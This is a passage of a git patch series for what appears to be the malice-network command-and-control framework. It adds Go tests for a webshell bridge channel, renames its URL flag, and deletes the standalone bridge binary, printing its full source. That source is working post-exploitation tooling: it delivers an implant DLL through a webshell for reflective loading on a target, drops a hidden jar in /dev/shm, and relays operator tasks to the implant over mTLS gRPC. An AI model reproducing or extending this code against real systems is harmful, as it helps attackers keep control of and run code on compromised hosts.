is rejected, which is the correct behavior. +} + +// TestHandshakeMultiChunkResponse verifies that if the bridge returns multiple +// response spites (streaming), the Go side can parse them all. +func TestHandshakeMultiChunkResponse(t *testing.T) { + srv, mock := startMockWebshell(t) + + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 + } + if stage == "init" { + regData, _ := proto.Marshal(mock.register) + sid := make([]byte, 4) + binary.LittleEndian.PutUint32(sid, mock.sessionID) + return append(sid, regData...), 200 + } + if stage == "spite" { + // Simulate a module that returns multiple chunks in one response. + outSpites := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Name: "chunk-1", TaskId: 10}, + {Name: "chunk-2", TaskId: 10}, + {Name: "chunk-3", TaskId: 10}, + }, + } + data, _ := proto.Marshal(outSpites) + return data, 200 + } + return nil, 404 + }) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + + // Open stream, send request, verify all chunks arrive. + respCh := ch.OpenStream(10) + ch.StartRecvLoop() + + received := 0 + timeout := time.After(3 * time.Second) + for received < 3 { + select { + case <-respCh: + received++ + case <-timeout: + t.Fatalf("timeout: got %d/3 chunks", received) + } + } +} + func TestJitterRange(t *testing.T) { base := 1 * time.Second minExpected := time.Duration(float64(base) * (1 - jitterFactor)) @@ -330,3 +573,151 @@ func TestJitterRange(t *testing.T) { } } } + +func TestStreamDispatchViaStreamMode(t *testing.T) { + srv, mock := startMockWebshell(t) + + // Build stream frames: 2 spites for task 200, then connection closes. + var frames [][]byte + for i := 0; i < 2; i++ { + spites := &implantpb.Spites{ + Spites: []*implantpb.Spite{{ + Name: fmt.Sprintf("stream-data-%d", i), + TaskId: 200, + }}, + } + data, _ := proto.Marshal(spites) + frames = append(frames, data) + } + mock.setStreamFrames(frames, 10*time.Millisecond) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("connect: %v", err) + } + + respCh := ch.OpenStream(200) + ch.StartRecvLoop() + + for i := 0; i < 2; i++ { + select { + case spite := <-respCh: + expected := fmt.Sprintf("stream-data-%d", i) + if spite.Name != expected { + t.Errorf("frame %d: expected %q, got %q", i, expected, spite.Name) + } + case <-time.After(3 * time.Second): + t.Fatalf("timeout waiting for stream frame %d", i) + } + } + ch.CloseStream(200) +} + +func TestStreamFallbackToPoll(t *testing.T) { + srv, mock := startMockWebshell(t) + + // Stream returns 404 (not supported) — should fall back to poll mode. + // Leave streamFrames nil so handleStream returns 404. + + var callCount int + var mu sync.Mutex + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + switch stage { + case "status": + return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 + case "init": + regData, _ := proto.Marshal(mock.register) + sid := make([]byte, 4) + binary.LittleEndian.PutUint32(sid, mock.sessionID) + return append(sid, regData...), 200 + case "stream": + return nil, 404 + case "spite": + mu.Lock() + callCount++ + n := callCount + mu.Unlock() + if n <= 2 { + resp := &implantpb.Spites{ + Spites: []*implantpb.Spite{{ + Name: "poll-data", + TaskId: 300, + }}, + } + data, _ := proto.Marshal(resp) + return data, 200 + } + empty, _ := proto.Marshal(&implantpb.Spites{}) + return empty, 200 + } + return nil, 404 + }) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("connect: %v", err) + } + + respCh := ch.OpenStream(300) + ch.StartRecvLoop() + + select { + case spite := <-respCh: + if spite.Name != "poll-data" { + t.Errorf("expected 'poll-data', got %q", spite.Name) + } + case <-time.After(5 * time.Second): + t.Fatal("timeout waiting for poll fallback data") + } + ch.CloseStream(300) +} + +func TestStreamHeartbeatFrame(t *testing.T) { + srv, mock := startMockWebshell(t) + + // Send: heartbeat (0-len frame), real data, heartbeat. + spites := &implantpb.Spites{ + Spites: []*implantpb.Spite{{Name: "after-heartbeat", TaskId: 400}}, + } + data, _ := proto.Marshal(spites) + mock.setStreamFrames([][]byte{ + {}, // zero-length heartbeat + data, // real frame + {}, // another heartbeat + }, 10*time.Millisecond) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("connect: %v", err) + } + + respCh := ch.OpenStream(400) + ch.StartRecvLoop() + + select { + case spite := <-respCh: + if spite.Name != "after-heartbeat" { + t.Errorf("expected 'after-heartbeat', got %q", spite.Name) + } + case <-time.After(3 * time.Second): + t.Fatal("timeout waiting for data after heartbeat") + } + ch.CloseStream(400) +} + +func TestReadFrameOversized(t *testing.T) { + // Frame length exceeding streamFrameMaxSize should error. + lenBuf := make([]byte, 4) + binary.BigEndian.PutUint32(lenBuf, streamFrameMaxSize+1) + r := bytes.NewReader(lenBuf) + _, err := readFrame(r) + if err == nil { + t.Fatal("expected error for oversized frame") + } +} diff --git a/server/cmd/webshell-bridge/config.go b/server/cmd/webshell-bridge/config.go index 293a0a7b..75e251c9 100644 --- a/server/cmd/webshell-bridge/config.go +++ b/server/cmd/webshell-bridge/config.go @@ -7,23 +7,14 @@ type Config struct { ListenerName string // listener name for registration ListenerIP string // listener external IP PipelineName string // pipeline name - Suo5URL string // suo5 webshell URL (e.g. suo5://target/suo5.jsp) + WebshellURL string // webshell URL (http:// or https://) StageToken string // auth token for X-Stage requests (must match webshell's STAGE_TOKEN) DLLPath string // optional path to bridge DLL for auto-loading + DepsDir string // optional dir containing dependency jars (e.g., jna.jar) for auto-delivery Debug bool // enable debug logging } -// WebshellHTTPURL converts the suo5:// URL to an http(s):// URL. +// WebshellHTTPURL returns the webshell URL for HTTP requests. func (c *Config) WebshellHTTPURL() string { - if len(c.Suo5URL) < 6 { - return c.Suo5URL - } - switch { - case len(c.Suo5URL) > 6 && c.Suo5URL[:6] == "suo5s:": - return "https:" + c.Suo5URL[6:] - case len(c.Suo5URL) > 5 && c.Suo5URL[:5] == "suo5:": - return "http:" + c.Suo5URL[5:] - default: - return c.Suo5URL - } + return c.WebshellURL } diff --git a/server/cmd/webshell-bridge/main.go b/server/cmd/webshell-bridge/main.go index 5214142b..a3ed4bd7 100644 --- a/server/cmd/webshell-bridge/main.go +++ b/server/cmd/webshell-bridge/main.go @@ -18,14 +18,15 @@ func main() { flag.StringVar(&cfg.ListenerName, "listener", "webshell-listener", "listener name") flag.StringVar(&cfg.ListenerIP, "ip", "127.0.0.1", "listener external IP") flag.StringVar(&cfg.PipelineName, "pipeline", "", "pipeline name (auto-generated if empty)") - flag.StringVar(&cfg.Suo5URL, "suo5", "", "suo5 webshell URL (e.g. suo5://target/suo5.jsp)") + flag.StringVar(&cfg.WebshellURL, "url", "", "webshell URL (e.g. http://target/shell.jsp)") flag.StringVar(&cfg.StageToken, "token", "", "auth token matching webshell's STAGE_TOKEN") flag.StringVar(&cfg.DLLPath, "dll", "", "path to bridge DLL for auto-loading (optional)") + flag.StringVar(&cfg.DepsDir, "deps", "", "dir containing dependency jars (e.g., jna.jar) for auto-delivery") flag.BoolVar(&cfg.Debug, "debug", false, "enable debug logging") flag.Parse() - if cfg.AuthFile == "" || cfg.Suo5URL == "" { - fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --suo5 --token \n") + if cfg.AuthFile == "" || cfg.WebshellURL == "" { + fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --url --token \n") flag.PrintDefaults() os.Exit(1) } diff --git a/server/cmd/webshell-bridge/session.go b/server/cmd/webshell-bridge/session.go index 14cce93c..aa4f183f 100644 --- a/server/cmd/webshell-bridge/session.go +++ b/server/cmd/webshell-bridge/session.go @@ -13,7 +13,7 @@ import ( // Session represents a single implant session managed by the bridge. // Each session owns a Channel that communicates with the malefic bind DLL -// on the target through the malefic protocol over suo5. +// on the target through the malefic protocol over HTTP. type Session struct { ID string PipelineID string From 53a9d3528eaae38d66ef9dd245b5e3adb8bf8330 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:15:37 +0800 Subject: [PATCH 13/19] refactor(webshell-bridge): remove standalone bridge binary The webshell bridge functionality is being moved into the listener process as WebShellPipeline, eliminating the need for a separate binary. --- server/cmd/webshell-bridge/bridge.go | 750 ------------------ server/cmd/webshell-bridge/bridge_test.go | 269 ------- server/cmd/webshell-bridge/channel.go | 561 ------------- server/cmd/webshell-bridge/channel_test.go | 723 ----------------- server/cmd/webshell-bridge/config.go | 20 - server/cmd/webshell-bridge/main.go | 63 -- server/cmd/webshell-bridge/main_test.go | 15 - .../cmd/webshell-bridge/pipelinectl/main.go | 98 --- server/cmd/webshell-bridge/session.go | 116 --- 9 files changed, 2615 deletions(-) delete mode 100644 server/cmd/webshell-bridge/bridge.go delete mode 100644 server/cmd/webshell-bridge/bridge_test.go delete mode 100644 server/cmd/webshell-bridge/channel.go delete mode 100644 server/cmd/webshell-bridge/channel_test.go delete mode 100644 server/cmd/webshell-bridge/config.go delete mode 100644 server/cmd/webshell-bridge/main.go delete mode 100644 server/cmd/webshell-bridge/main_test.go delete mode 100644 server/cmd/webshell-bridge/pipelinectl/main.go delete mode 100644 server/cmd/webshell-bridge/session.go diff --git a/server/cmd/webshell-bridge/bridge.go b/server/cmd/webshell-bridge/bridge.go deleted file mode 100644 index 389c1cb4..00000000 --- a/server/cmd/webshell-bridge/bridge.go +++ /dev/null @@ -1,750 +0,0 @@ -package main - -import ( - "context" - "errors" - "fmt" - "io" - "os" - "path/filepath" - "strconv" - "strings" - "sync" - "time" - - "github.com/chainreactors/IoM-go/consts" - mtls "github.com/chainreactors/IoM-go/mtls" - "github.com/chainreactors/IoM-go/proto/client/clientpb" - "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "github.com/chainreactors/IoM-go/proto/services/listenerrpc" - iomtypes "github.com/chainreactors/IoM-go/types" - "github.com/chainreactors/logs" - "github.com/chainreactors/malice-network/helper/cryptography" - "google.golang.org/grpc" - "google.golang.org/grpc/codes" - "google.golang.org/grpc/metadata" - "google.golang.org/grpc/status" -) - -const ( - pipelineType = "webshell" - checkinInterval = 30 * time.Second - retryBaseDelay = 2 * time.Second - retryMaxDelay = 60 * time.Second - retryMaxAttempts = 20 -) - -// Bridge is the WebShell bridge that connects to the IoM server via -// ListenerRPC and manages webshell-backed sessions through HTTP endpoints. -// -// The bridge owns the listener runtime only. Custom pipelines are created and -// controlled through pipeline start/stop events from the server. -type Bridge struct { - cfg *Config - - conn *grpc.ClientConn - rpc listenerrpc.ListenerRPCClient - jobStream listenerrpc.ListenerRPC_JobStreamClient - - activeMu sync.Mutex - active *pipelineRuntime -} - -type pipelineRuntime struct { - name string - ctx context.Context - cancel context.CancelFunc - spiteStream listenerrpc.ListenerRPC_SpiteStreamClient - sendMu sync.Mutex - sessions sync.Map // sessionID -> *Session - streamTasks sync.Map // "sessionID:taskID" -> context.CancelFunc (pump goroutine) - done chan struct{} -} - -// NewBridge creates a new bridge instance. -func NewBridge(cfg *Config) (*Bridge, error) { - return &Bridge{cfg: cfg}, nil -} - -// Start runs the bridge lifecycle: -// 1. Connect to server via mTLS -// 2. Register listener -// 3. Open JobStream -// 4. Wait for pipeline start/stop controls -func (b *Bridge) Start(parent context.Context) error { - ctx, cancel := context.WithCancel(parent) - defer cancel() - - if err := b.connect(ctx); err != nil { - return fmt.Errorf("connect: %w", err) - } - defer b.shutdown() - defer b.conn.Close() - logs.Log.Important("connected to server") - - go func() { - <-ctx.Done() - if b.conn != nil { - _ = b.conn.Close() - } - }() - - if _, err := b.rpc.RegisterListener(b.listenerCtx(ctx), &clientpb.RegisterListener{ - Name: b.cfg.ListenerName, - Host: b.cfg.ListenerIP, - }); err != nil { - return fmt.Errorf("register listener: %w", err) - } - logs.Log.Importantf("registered listener: %s", b.cfg.ListenerName) - - var err error - b.jobStream, err = b.rpc.JobStream(b.listenerCtx(ctx)) - if err != nil { - return fmt.Errorf("open job stream: %w", err) - } - logs.Log.Importantf("waiting for pipeline %s control messages", b.cfg.PipelineName) - - return b.runJobLoop(ctx) -} - -// connectDLL establishes a channel to the DLL on the target. -// Sends HTTP requests to the webshell which calls DLL exports directly -// via function pointers (memory channel). No TCP port opened on target. -// Retries with exponential backoff up to retryMaxAttempts before giving up. -func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error { - sessionID := cryptography.RandomString(8) - - channel := NewChannel(b.cfg.WebshellHTTPURL(), b.cfg.StageToken) - logs.Log.Importantf("waiting for DLL at %s ...", b.cfg.WebshellHTTPURL()) - - // Read DLL bytes once if --dll is provided. - var dllBytes []byte - if b.cfg.DLLPath != "" { - var err error - dllBytes, err = os.ReadFile(b.cfg.DLLPath) - if err != nil { - return fmt.Errorf("read DLL file %s: %w", b.cfg.DLLPath, err) - } - logs.Log.Importantf("loaded DLL from %s (%d bytes)", b.cfg.DLLPath, len(dllBytes)) - } - - dllDelivered := false - depsDelivered := false - delay := retryBaseDelay - for attempt := 1; attempt <= retryMaxAttempts; attempt++ { - select { - case <-ctx.Done(): - return ctx.Err() - default: - } - - if err := channel.Connect(ctx); err != nil { - // Deliver dependency jars (e.g., jna.jar) before DLL load. - // JSP needs jna.jar for JNA resolution during DLL loading, - // so deps must be present before the DLL can be reflectively loaded. - if b.cfg.DepsDir != "" && !depsDelivered { - needDeps := true - if channel.lastStatus != nil && channel.lastStatus.DepsPresent { - needDeps = false - logs.Log.Debug("deps already present on target, skipping delivery") - depsDelivered = true - } - if needDeps { - logs.Log.Important("delivering dependency jars before DLL load") - if depErr := b.deliverDeps(ctx, channel); depErr != nil { - logs.Log.Warnf("deps delivery failed (attempt %d/%d): %v", attempt, retryMaxAttempts, depErr) - } else { - depsDelivered = true - } - } - } - - // Auto-load DLL if we have it and haven't delivered yet. - if dllBytes != nil && !dllDelivered { - logs.Log.Importantf("DLL not loaded, delivering via X-Stage: load (%d bytes)", len(dllBytes)) - if loadErr := channel.LoadDLL(ctx, dllBytes); loadErr != nil { - logs.Log.Warnf("DLL delivery failed (attempt %d/%d): %v", attempt, retryMaxAttempts, loadErr) - } else { - logs.Log.Important("DLL delivered, waiting for reflective load") - dllDelivered = true - } - } - - logs.Log.Debugf("DLL not ready (attempt %d/%d): %v (retry in %s)", - attempt, retryMaxAttempts, err, delay) - if attempt == retryMaxAttempts { - return fmt.Errorf("DLL connect failed after %d attempts: %w", retryMaxAttempts, err) - } - select { - case <-ctx.Done(): - return ctx.Err() - case <-time.After(delay): - } - delay *= 2 - if delay > retryMaxDelay { - delay = retryMaxDelay - } - continue - } - break - } - - logs.Log.Important("DLL connected via memory channel") - - sess, err := NewSession( - b.rpc, b.pipelineCtx(ctx, runtime.name), - sessionID, runtime.name, b.cfg.ListenerName, - channel, - ) - if err != nil { - _ = channel.Close() - return fmt.Errorf("create session: %w", err) - } - - channel.StartRecvLoop() - runtime.sessions.Store(sess.ID, sess) - return nil -} - -// deliverDeps uploads dependency jars from --deps directory to the webshell. -// Files matching *.jar are sent with fixed name ".jna.jar" to /dev/shm on target. -func (b *Bridge) deliverDeps(ctx context.Context, channel *Channel) error { - entries, err := os.ReadDir(b.cfg.DepsDir) - if err != nil { - return fmt.Errorf("read deps dir %s: %w", b.cfg.DepsDir, err) - } - for _, entry := range entries { - if entry.IsDir() || !strings.HasSuffix(strings.ToLower(entry.Name()), ".jar") { - continue - } - data, err := os.ReadFile(filepath.Join(b.cfg.DepsDir, entry.Name())) - if err != nil { - return fmt.Errorf("read dep %s: %w", entry.Name(), err) - } - // Fixed name: JSP expects .jna.jar at /dev/shm - if err := channel.DeliverDep(ctx, ".jna.jar", data); err != nil { - return fmt.Errorf("deliver %s as .jna.jar: %w", entry.Name(), err) - } - logs.Log.Importantf("delivered %s as .jna.jar (%d bytes)", entry.Name(), len(data)) - break // only deliver one jar - } - return nil -} - -// connect establishes the mTLS gRPC connection to the server. -func (b *Bridge) connect(ctx context.Context) error { - authCfg, err := mtls.ReadConfig(b.cfg.AuthFile) - if err != nil { - return fmt.Errorf("read auth config: %w", err) - } - - addr := authCfg.Address() - if b.cfg.ServerAddr != "" { - addr = b.cfg.ServerAddr - } - - options, err := mtls.GetGrpcOptions( - []byte(authCfg.CACertificate), - []byte(authCfg.Certificate), - []byte(authCfg.PrivateKey), - authCfg.Type, - ) - if err != nil { - return fmt.Errorf("get grpc options: %w", err) - } - - b.conn, err = grpc.DialContext(ctx, addr, options...) - if err != nil { - return fmt.Errorf("grpc dial: %w", err) - } - - b.rpc = listenerrpc.NewListenerRPCClient(b.conn) - return nil -} - -func (b *Bridge) shutdown() { - if err := b.stopActiveRuntime(""); err != nil { - logs.Log.Debugf("stop active runtime during shutdown: %v", err) - } - if b.jobStream != nil { - _ = b.jobStream.CloseSend() - } -} - -func (b *Bridge) runJobLoop(ctx context.Context) error { - for { - msg, err := b.jobStream.Recv() - if err != nil { - if ctx.Err() != nil || errors.Is(err, io.EOF) { - return nil - } - switch status.Code(err) { - case codes.Canceled, codes.Unavailable: - if ctx.Err() != nil { - return nil - } - } - return fmt.Errorf("job stream recv: %w", err) - } - - statusMsg := b.handleJobCtrl(ctx, msg) - if err := b.jobStream.Send(statusMsg); err != nil { - if ctx.Err() != nil { - return nil - } - return fmt.Errorf("job stream send: %w", err) - } - } -} - -func (b *Bridge) handleJobCtrl(ctx context.Context, msg *clientpb.JobCtrl) *clientpb.JobStatus { - statusMsg := &clientpb.JobStatus{ - ListenerId: b.cfg.ListenerName, - Ctrl: msg.GetCtrl(), - CtrlId: msg.GetId(), - Status: int32(consts.CtrlStatusSuccess), - Job: msg.GetJob(), - } - - var err error - switch msg.GetCtrl() { - case consts.CtrlPipelineStart: - err = b.handlePipelineStart(ctx, msg.GetJob()) - case consts.CtrlPipelineStop: - err = b.handlePipelineStop(msg.GetJob()) - case consts.CtrlPipelineSync: - err = b.handlePipelineSync(msg.GetJob()) - default: - err = fmt.Errorf("unsupported ctrl %q", msg.GetCtrl()) - } - - if err != nil { - statusMsg.Status = int32(consts.CtrlStatusFailed) - statusMsg.Error = err.Error() - logs.Log.Errorf("job %s failed: %v", msg.GetCtrl(), err) - } - - return statusMsg -} - -func (b *Bridge) handlePipelineStart(ctx context.Context, job *clientpb.Job) error { - pipe := job.GetPipeline() - if pipe == nil { - return fmt.Errorf("missing pipeline in start job") - } - if t := pipe.GetType(); t != pipelineType && t != "tcp" && t != "" { - return fmt.Errorf("unsupported pipeline type %q", t) - } - if err := b.ensurePipelineMatch(pipe.GetName()); err != nil { - return err - } - - runtimeCtx, cancel := context.WithCancel(ctx) - runtime := &pipelineRuntime{ - name: pipe.GetName(), - ctx: runtimeCtx, - cancel: cancel, - done: make(chan struct{}), - } - - b.activeMu.Lock() - if active := b.active; active != nil { - b.activeMu.Unlock() - cancel() - if active.name == pipe.GetName() { - logs.Log.Debugf("pipeline %s already active", pipe.GetName()) - return nil - } - return fmt.Errorf("pipeline %s already active", active.name) - } - b.active = runtime - b.activeMu.Unlock() - - spiteStream, err := b.rpc.SpiteStream(b.pipelineCtx(runtimeCtx, runtime.name)) - if err != nil { - b.clearActiveRuntime(runtime) - cancel() - return fmt.Errorf("open spite stream: %w", err) - } - runtime.spiteStream = spiteStream - - go b.runRuntime(runtime) - logs.Log.Importantf("pipeline %s starting; waiting for DLL at %s", runtime.name, b.cfg.WebshellHTTPURL()) - return nil -} - -func (b *Bridge) handlePipelineStop(job *clientpb.Job) error { - name, err := b.jobPipelineName(job) - if err != nil { - return err - } - if err := b.ensurePipelineMatch(name); err != nil { - return err - } - logs.Log.Importantf("stopping pipeline %s", name) - return b.stopActiveRuntime(name) -} - -func (b *Bridge) handlePipelineSync(job *clientpb.Job) error { - name, err := b.jobPipelineName(job) - if err != nil { - return err - } - if err := b.ensurePipelineMatch(name); err != nil { - return err - } - logs.Log.Debugf("pipeline %s sync acknowledged", name) - return nil -} - -func (b *Bridge) jobPipelineName(job *clientpb.Job) (string, error) { - if job == nil { - return "", fmt.Errorf("missing job") - } - if pipe := job.GetPipeline(); pipe != nil && pipe.GetName() != "" { - return pipe.GetName(), nil - } - if job.GetName() != "" { - return job.GetName(), nil - } - return "", fmt.Errorf("missing pipeline name") -} - -func (b *Bridge) ensurePipelineMatch(name string) error { - if name == "" { - return fmt.Errorf("missing pipeline name") - } - if b.cfg.PipelineName != "" && name != b.cfg.PipelineName { - return fmt.Errorf("bridge configured for pipeline %s, got %s", b.cfg.PipelineName, name) - } - return nil -} - -func (b *Bridge) stopActiveRuntime(name string) error { - b.activeMu.Lock() - runtime := b.active - if runtime == nil { - b.activeMu.Unlock() - return nil - } - if name != "" && runtime.name != name { - b.activeMu.Unlock() - return fmt.Errorf("active pipeline is %s, not %s", runtime.name, name) - } - b.active = nil - b.activeMu.Unlock() - - b.stopRuntime(runtime) - return nil -} - -func (b *Bridge) stopRuntime(runtime *pipelineRuntime) { - if runtime == nil { - return - } - - runtime.cancel() - if runtime.spiteStream != nil { - _ = runtime.spiteStream.CloseSend() - } - b.closeRuntimeSessions(runtime) - - select { - case <-runtime.done: - case <-time.After(2 * time.Second): - } -} - -func (b *Bridge) runRuntime(runtime *pipelineRuntime) { - syncStop := false - defer func() { - b.clearActiveRuntime(runtime) - close(runtime.done) - if syncStop { - go b.syncPipelineStop(runtime.name) - } - }() - - if err := b.connectDLL(runtime.ctx, runtime); err != nil { - if runtime.ctx.Err() == nil { - syncStop = true - logs.Log.Errorf("pipeline %s failed before session registration: %v", runtime.name, err) - } - return - } - - logs.Log.Importantf("pipeline %s active", runtime.name) - go b.checkinLoop(runtime) - b.handleSpiteStream(runtime) -} - -func (b *Bridge) closeRuntimeSessions(runtime *pipelineRuntime) { - // Cancel all streaming task pumps first. - runtime.streamTasks.Range(func(key, value interface{}) bool { - value.(context.CancelFunc)() - runtime.streamTasks.Delete(key) - return true - }) - - runtime.sessions.Range(func(key, value interface{}) bool { - runtime.sessions.Delete(key) - _ = value.(*Session).Close() - return true - }) -} - -// listenerCtx returns a context with listener metadata. -func (b *Bridge) listenerCtx(parent context.Context) context.Context { - return metadata.NewOutgoingContext(parent, metadata.Pairs( - "listener_id", b.cfg.ListenerName, - "listener_ip", b.cfg.ListenerIP, - )) -} - -// pipelineCtx returns a context with pipeline metadata. -func (b *Bridge) pipelineCtx(parent context.Context, pipelineName string) context.Context { - return metadata.NewOutgoingContext(parent, metadata.Pairs( - "listener_id", b.cfg.ListenerName, - "listener_ip", b.cfg.ListenerIP, - "pipeline_id", pipelineName, - )) -} - -func (b *Bridge) sessionCtx(parent context.Context, sessionID string) context.Context { - return metadata.NewOutgoingContext(parent, metadata.Pairs( - "session_id", sessionID, - "listener_id", b.cfg.ListenerName, - "listener_ip", b.cfg.ListenerIP, - "timestamp", strconv.FormatInt(time.Now().Unix(), 10), - )) -} - -// handleSpiteStream receives task requests from the server and forwards them -// through the malefic channel to the bind DLL on the target. -func (b *Bridge) handleSpiteStream(runtime *pipelineRuntime) { - for { - req, err := runtime.spiteStream.Recv() - if err != nil { - if runtime.ctx.Err() != nil || errors.Is(err, io.EOF) { - return - } - switch status.Code(err) { - case codes.Canceled, codes.Unavailable: - if runtime.ctx.Err() != nil { - return - } - } - logs.Log.Errorf("spite stream recv (%s): %v", runtime.name, err) - return - } - - spite := req.GetSpite() - sessionID := req.GetSession().GetSessionId() - if spite == nil || sessionID == "" { - continue - } - - var taskID uint32 - if t := req.GetTask(); t != nil { - taskID = t.GetTaskId() - } - - logs.Log.Debugf("task %d for session %s: %s", taskID, sessionID, spite.Name) - go b.forwardToSession(runtime, sessionID, taskID, req) - } -} - -func (b *Bridge) clearActiveRuntime(runtime *pipelineRuntime) { - if runtime == nil { - return - } - if runtime.spiteStream != nil { - _ = runtime.spiteStream.CloseSend() - } - - b.activeMu.Lock() - if b.active == runtime { - b.active = nil - } - b.activeMu.Unlock() - - b.closeRuntimeSessions(runtime) -} - -func (b *Bridge) syncPipelineStop(name string) { - if b.rpc == nil || name == "" { - return - } - _, err := b.rpc.StopPipeline(context.Background(), &clientpb.CtrlPipeline{ - Name: name, - ListenerId: b.cfg.ListenerName, - }) - if err != nil { - logs.Log.Errorf("sync failed pipeline stop for %s: %v", name, err) - } -} - -// forwardToSession routes a SpiteRequest to the appropriate session. -// Streaming tasks (Task.Total < 0) get a persistent response pump; unary tasks -// use the simple request/response path. -func (b *Bridge) forwardToSession(runtime *pipelineRuntime, sessionID string, taskID uint32, req *clientpb.SpiteRequest) { - sess, ok := runtime.sessions.Load(sessionID) - if !ok { - err := fmt.Errorf("session %s not found", sessionID) - logs.Log.Warnf("%v, dropping task %d", err, taskID) - b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) - return - } - - session := sess.(*Session) - isStreaming := req.GetTask().GetTotal() < 0 - streamKey := fmt.Sprintf("%s:%d", sessionID, taskID) - - if isStreaming { - // Check if a pump already exists (subsequent command on same stream, e.g. PTY input) - if _, exists := runtime.streamTasks.Load(streamKey); exists { - if err := session.SendTaskSpite(taskID, req.GetSpite()); err != nil { - logs.Log.Errorf("session %s task %d stream send: %v", sessionID, taskID, err) - b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) - } - return - } - - // New streaming task: open channel, send initial request, start pump. - ch := session.OpenTaskStream(taskID) - if err := session.SendTaskSpite(taskID, req.GetSpite()); err != nil { - session.CloseTaskStream(taskID) - logs.Log.Errorf("session %s task %d initial send: %v", sessionID, taskID, err) - b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) - return - } - - pumpCtx, pumpCancel := context.WithCancel(runtime.ctx) - runtime.streamTasks.Store(streamKey, pumpCancel) - go b.responsePump(runtime, session, sessionID, taskID, streamKey, ch, pumpCtx, pumpCancel) - return - } - - // Unary path: send request, wait for one response. - resp, err := session.HandleUnary(taskID, req.GetSpite()) - if err != nil { - logs.Log.Errorf("session %s task %d error: %v", sessionID, taskID, err) - if !session.Alive() { - logs.Log.Warnf("session %s channel dead, removing from runtime", sessionID) - runtime.sessions.Delete(sessionID) - _ = session.Close() - } - b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) - return - } - if resp == nil { - err := fmt.Errorf("empty response from DLL") - logs.Log.Errorf("session %s task %d error: %v", sessionID, taskID, err) - b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) - return - } - - if err := b.sendSpiteResponse(runtime, sessionID, taskID, resp); err != nil { - logs.Log.Errorf("spite stream send: %v", err) - } -} - -// responsePump reads streaming responses from the DLL channel and forwards -// each one to the server's SpiteStream. Runs until the channel is closed, -// the context is cancelled, or a send error occurs. -func (b *Bridge) responsePump( - runtime *pipelineRuntime, - session *Session, - sessionID string, - taskID uint32, - streamKey string, - ch <-chan *implantpb.Spite, - ctx context.Context, - cancel context.CancelFunc, -) { - defer func() { - cancel() - runtime.streamTasks.Delete(streamKey) - session.CloseTaskStream(taskID) - logs.Log.Debugf("response pump exited for task %d on session %s", taskID, sessionID) - }() - - for { - select { - case <-ctx.Done(): - return - case spite, ok := <-ch: - if !ok { - // Channel closed (recvLoop exit or session teardown) - return - } - if err := b.sendSpiteResponse(runtime, sessionID, taskID, spite); err != nil { - logs.Log.Errorf("stream pump send for task %d: %v", taskID, err) - return - } - } - } -} - -func (b *Bridge) sendTaskError(runtime *pipelineRuntime, sessionID string, taskID uint32, req *implantpb.Spite, err error) { - name := "" - if req != nil { - name = req.GetName() - } - if sendErr := b.sendSpiteResponse(runtime, sessionID, taskID, taskErrorSpite(taskID, name, err)); sendErr != nil { - logs.Log.Debugf("send task error response failed: %v", sendErr) - } -} - -func taskErrorSpite(taskID uint32, name string, err error) *implantpb.Spite { - return &implantpb.Spite{ - Name: name, - TaskId: taskID, - Error: iomtypes.MaleficErrorTaskError, - Status: &implantpb.Status{ - TaskId: taskID, - Status: iomtypes.TaskErrorOperatorError, - Error: err.Error(), - }, - Body: &implantpb.Spite_Empty{ - Empty: &implantpb.Empty{}, - }, - } -} - -func (b *Bridge) sendSpiteResponse(runtime *pipelineRuntime, sessionID string, taskID uint32, spite *implantpb.Spite) error { - runtime.sendMu.Lock() - defer runtime.sendMu.Unlock() - - return runtime.spiteStream.Send(&clientpb.SpiteResponse{ - ListenerId: b.cfg.ListenerName, - SessionId: sessionID, - TaskId: taskID, - Spite: spite, - }) -} - -// checkinLoop sends periodic heartbeats for all registered sessions. -func (b *Bridge) checkinLoop(runtime *pipelineRuntime) { - ticker := time.NewTicker(checkinInterval) - defer ticker.Stop() - - for { - select { - case <-runtime.ctx.Done(): - return - case <-ticker.C: - runtime.sessions.Range(func(key, value interface{}) bool { - sess := value.(*Session) - if !sess.Alive() { - logs.Log.Warnf("session %s channel dead, removing", sess.ID) - runtime.sessions.Delete(key) - _ = sess.Close() - return true - } - sess.Checkin(b.rpc, b.sessionCtx(runtime.ctx, sess.ID)) - return true - }) - } - } -} diff --git a/server/cmd/webshell-bridge/bridge_test.go b/server/cmd/webshell-bridge/bridge_test.go deleted file mode 100644 index 5ac64c06..00000000 --- a/server/cmd/webshell-bridge/bridge_test.go +++ /dev/null @@ -1,269 +0,0 @@ -package main - -import ( - "context" - "errors" - "fmt" - "io" - "sync" - "testing" - "time" - - "github.com/chainreactors/IoM-go/proto/client/clientpb" - "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "github.com/chainreactors/IoM-go/proto/services/listenerrpc" - "google.golang.org/grpc" - "google.golang.org/grpc/metadata" - "google.golang.org/protobuf/proto" -) - -type fakeBridgeRPC struct { - listenerrpc.ListenerRPCClient - - mu sync.Mutex - stopCalls []*clientpb.CtrlPipeline - spiteStream listenerrpc.ListenerRPC_SpiteStreamClient -} - -func (f *fakeBridgeRPC) SpiteStream(ctx context.Context, opts ...grpc.CallOption) 